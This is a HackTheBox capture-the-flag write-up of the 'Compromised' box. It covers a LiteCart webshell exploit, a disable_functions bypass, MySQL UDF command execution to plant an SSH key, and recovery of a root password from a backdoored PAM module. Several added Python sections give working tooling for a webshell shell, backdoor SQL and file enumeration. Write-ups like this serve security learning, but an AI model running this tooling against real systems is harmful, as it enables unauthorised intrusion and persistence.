HackTheBox Writeup — Compromised

Hello guys, I am Faisal Husaini. My username on HTB is “fa1sal”. Also join me on Discord.

The IP of this box is 10.10.10.207

Running an Nmap full port scan on it, we get

Got 2 open ports: port 22 for SSH and port 80 for HTTP.

Moving onto the web part first.

Checking out the web service, I see a shopping website.

The website is running LiteCart. Running GoBuster against the web server

The /backup directory is interesting, as it contains a backup file named a.tar.gz.

Downloading the file to our local machine.

Extracting the archive and checking the contents.

Analyzing the code of login.php, there is a commented-out block that writes the submitted username and password to a text file.

Fetching that file from the web server gives me a username and password.

Searching for exploits for LiteCart gives me a successful hit.

Using the Python exploit on the target with the credentials I got.

It says the exploit uploaded the webshell and that I can access it through the given URL.

But I am unable to run system commands, due to some kind of PHP hardening (PHP code itself runs, only the exec-style functions are blocked; the usual cause is the disable_functions directive, which ini_get('disable_functions') or phpinfo() will show). To confirm that, I modified the Python exploit to upload a PHP file which just echoes “Working!!!”, and it works.

I can bypass the filter using the exploit below.

Modifying the exploit to include the above code and re-running it.

This time the exploit was successful and I was able to run system commands, so I will use the webwrap tool to turn the parameter-based command execution into an interactive shell through a wrapper.
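The two steps above, the “Working!!!” sanity check and the parameter-based command wrapper, as an added example (this is not the post's exploit and not the webwrap tool itself). It assumes a webshell that runs the value of a `cmd` GET parameter and returns the output in the response body; the shell URL, the parameter name and the `__WW__` marker are assumptions. The `probe()` function is the same idea as the echo test: if the markers never come back, PHP is running but commands are not being executed.

```python
"""Minimal webwrap-style wrapper for a parameter-based PHP webshell (added example)."""
import shlex
import sys
import urllib.parse
import urllib.request
from typing import Callable, Optional

# Marker echoed around each command so real output can be told apart from
# whatever HTML the webshell or the page template emits around it.
MARKER = "__WW__"


def build_url(base_url: str, cmd: str, param: str = "cmd") -> str:
    """Return base_url with the marker-wrapped command as a query parameter."""
    wrapped = f"echo {MARKER}; {cmd}; echo {MARKER}"
    sep = "&" if "?" in base_url else "?"
    return base_url + sep + urllib.parse.urlencode({param: wrapped})


def extract_output(body: str) -> Optional[str]:
    """Return the text between the two markers, or None when they are absent,
    which means the webshell did not actually execute the command."""
    first = body.find(MARKER)
    if first == -1:
        return None
    last = body.find(MARKER, first + len(MARKER))
    if last == -1:
        return None
    return body[first + len(MARKER):last].strip("\n")


def http_get(url: str) -> str:
    """Default transport: plain GET, body decoded as UTF-8 with replacement."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def run_cmd(base_url: str, cmd: str, transport: Callable[[str], str] = http_get,
            param: str = "cmd") -> Optional[str]:
    """Execute cmd through the webshell; None means no command output came back."""
    return extract_output(transport(build_url(base_url, cmd, param)))


def probe(base_url: str, transport: Callable[[str], str] = http_get) -> bool:
    """The post's 'Working!!!' check: True only when a system command really runs."""
    return run_cmd(base_url, "echo Working!!!", transport) == "Working!!!"


def shell(base_url: str, transport: Callable[[str], str] = http_get) -> None:
    """Interactive loop; each line typed is sent as one command. 'cd' is emulated
    by re-entering the remembered directory before every command."""
    if not probe(base_url, transport):
        print("[-] webshell answers but does not execute commands (disable_functions?)")
        return
    cwd = "."
    while True:
        try:
            line = input(f"webwrap:{cwd}$ ").strip()
        except EOFError:
            break
        if line in ("exit", "quit"):
            break
        out = run_cmd(base_url, f"cd {shlex.quote(cwd)}; {line}; echo; pwd", transport)
        if out is None:
            print("[-] no output markers in response")
            continue
        *lines, cwd = out.split("\n")
        if lines and lines[-1] == "":
            lines.pop()  # blank line added by the 'echo' separator
        print("\n".join(lines))


if __name__ == "__main__":
    # Shell path is an assumption; pass the URL the exploit printed.
    shell(sys.argv[1] if len(sys.argv) > 1 else "http://10.10.10.207/shell.php")
```

The transport is a plain callable so the same wrapper works over a proxy or a POST-based shell by swapping one function; the markers also make it obvious when a command silently fails instead of returning an empty page.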

Enumerating the webroot, there is a file config.ini.php which contains the MySQL connection details.

Now enumerating the database, it can be seen that it has been backdoored: there is an exec_cmd function which executes system commands (MySQL has no built-in function for that, so this is a user-defined function loaded from a shared library).

Using this, I uploaded my SSH public key into the mysql user's authorized_keys file.
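How to find and use such a UDF backdoor, as an added example (not from the post). The function name exec_cmd comes from the post; the mysql.func lookup, the home directory /var/lib/mysql and the key line are assumptions. The statements are only generated here, run them with whatever MySQL client you have; the point is the two layers of quoting, since the key must survive the SQL string literal and then the shell.

```python
"""Generate SQL that drives a MySQL command-execution UDF (added example)."""
import shlex
from typing import List

# Every registered UDF appears in mysql.func together with the shared object it
# was loaded from; a backdoor such as exec_cmd shows up here.
LIST_UDFS = "SELECT name, ret, dl, type FROM mysql.func;"


def sql_str(value: str) -> str:
    """Quote a value as a MySQL single-quoted string literal (backslash escaping,
    which assumes sql_mode does not contain NO_BACKSLASH_ESCAPES)."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def exec_cmd_sql(shell_cmd: str, udf: str = "exec_cmd") -> str:
    """One statement that makes the server run shell_cmd through the UDF."""
    return f"SELECT {udf}({sql_str(shell_cmd)});"


def install_key_sql(pubkey: str, home: str = "/var/lib/mysql",
                    udf: str = "exec_cmd") -> List[str]:
    """Statements that create ~/.ssh with sshd-acceptable permissions and append
    the key. shlex.quote protects the key (spaces, '+', '/', '=') from the shell,
    sql_str protects the whole command from the SQL parser."""
    pubkey = pubkey.strip()
    if not pubkey.startswith(("ssh-ed25519 ", "ssh-rsa ", "ecdsa-sha2-")):
        raise ValueError("not an OpenSSH public key line")
    ssh_dir = f"{home}/.ssh"
    auth_keys = f"{ssh_dir}/authorized_keys"
    cmds = [
        f"mkdir -p {shlex.quote(ssh_dir)}",
        f"chmod 700 {shlex.quote(ssh_dir)}",
        f"echo {shlex.quote(pubkey)} >> {shlex.quote(auth_keys)}",
        f"chmod 600 {shlex.quote(auth_keys)}",
    ]
    return [exec_cmd_sql(c, udf) for c in cmds]


if __name__ == "__main__":
    # Constructed key line, not a real key.
    print(LIST_UDFS)
    for stmt in install_key_sql("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKey attacker@kali"):
        print(stmt)
```

This only yields a login if the mysql account has a real shell and sshd's StrictModes is satisfied by the ownership of the home directory and .ssh, which is why the chmod steps are included; if the server's sql_mode has NO_BACKSLASH_ESCAPES, switch sql_str to doubling single quotes instead.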

Now connecting as the mysql user over SSH with the key I uploaded.

Enumerating further leads to a file which is readable by the current user and by root but not world-readable, so it may contain something useful.
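A way to surface exactly that class of file during enumeration, as an added example (not a command from the post): regular files whose world-read bit is clear but that the current account can still read, usually through ownership or group membership. The sample tree in `demo()` is constructed so the logic can be checked offline.

```python
"""List files readable by this account that are not world-readable (added example)."""
import os
import stat
import tempfile
from typing import Iterator, List, Tuple

SKIP_DIRS = ("/proc", "/sys", "/dev", "/run")


def private_readable_files(root: str) -> Iterator[Tuple[str, int]]:
    """Yield (path, permission bits) for regular files under root whose
    'other' read bit is clear but which os.access() says we can read."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # Pseudo-filesystems are noise for this check.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_IROTH:
                continue  # world-readable: anyone could read it, not interesting here
            if os.access(path, os.R_OK):
                yield path, stat.S_IMODE(st.st_mode)


def demo() -> List[str]:
    """Build a constructed tree: one 0640 log and one 0644 log, return the
    basenames the scan reports (only the 0640 one)."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode in (("auth-backup.log", 0o640), ("access.log", 0o644)):
            path = os.path.join(tmp, name)
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
            os.chmod(path, mode)
        return sorted(os.path.basename(p) for p, _ in private_readable_files(tmp))


if __name__ == "__main__":
    for path, mode in private_readable_files("/"):
        print(f"{mode:04o} {path}")
```

Run it as the low-privileged user you actually have; as root os.access() reports everything readable and the list degenerates into every non-world-readable file on the box.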

Checking the file, there are some password logs in it.

Trying these password combinations against the available users on the machine over SSH, one of them works.

Time for privesc.

Since this machine is themed around a backdoor and a compromise, there might be rootkits present.

Checking for files with “backdoor” in the name turns up a pam_unix.so file.

Analyzing the file in Ghidra, it can be seen that the password is split into two hex-encoded strings.

Decoding the hex strings gives the two halves of the password.

Combining them gives the password:

zlke~U3Env82m2-
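The decoding step, as an added example (not the post's own procedure). The two constants below were constructed by splitting the password the post recovers into 8 + 7 bytes, so the result can be checked; they are not the literal values from the post's Ghidra screenshot. The byte-order handling is the part that matters: on x86-64 Ghidra displays an inline string constant as a machine-order immediate (for instance a MOV of 0x4533557e656b6c7a onto the stack), so the bytes have to be reversed to read them, whereas a string that was hex-encoded as text decodes in the order written.

```python
"""Recover a password stored as hex constants in a backdoored binary (added example)."""
from typing import List


def decode_hex(hexstr: str, little_endian: bool = True) -> bytes:
    """Turn '0x...' or bare hex into the bytes it represents in memory.
    The width comes from the value itself, so a 7-byte constant whose leading
    zero byte the disassembler dropped still decodes to the right bytes."""
    value = int(hexstr, 16)
    width = max(1, (value.bit_length() + 7) // 8)
    return value.to_bytes(width, "little" if little_endian else "big")


def recover_password(constants: List[str], little_endian: bool = True) -> str:
    """Decode each constant, drop NUL padding, join in source order and refuse
    anything non-printable, which usually means the byte order was wrong."""
    parts = [decode_hex(c, little_endian).rstrip(b"\x00") for c in constants]
    joined = b"".join(parts)
    if not all(32 <= b < 127 for b in joined):
        raise ValueError("non-printable bytes: wrong byte order, or not a string?")
    return joined.decode("ascii")


# Constructed from the post's final password: first 8 bytes, then the last 7,
# written the way x86-64 immediates appear in a disassembler (little-endian).
CONSTANTS = ["0x4533557e656b6c7a", "0x2d326d3238766e"]

if __name__ == "__main__":
    print(recover_password(CONSTANTS))  # zlke~U3Env82m2-
```

If the two halves come out as readable text but in the wrong order, swap the list; if they come out reversed within each half, flip little_endian, which is the common mistake when copying immediates out of the decompiler view.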

Using this password for root gets me root.

Hacker | Bug Hunter | Python Coder | Gamer | Reverse Engineering Lover
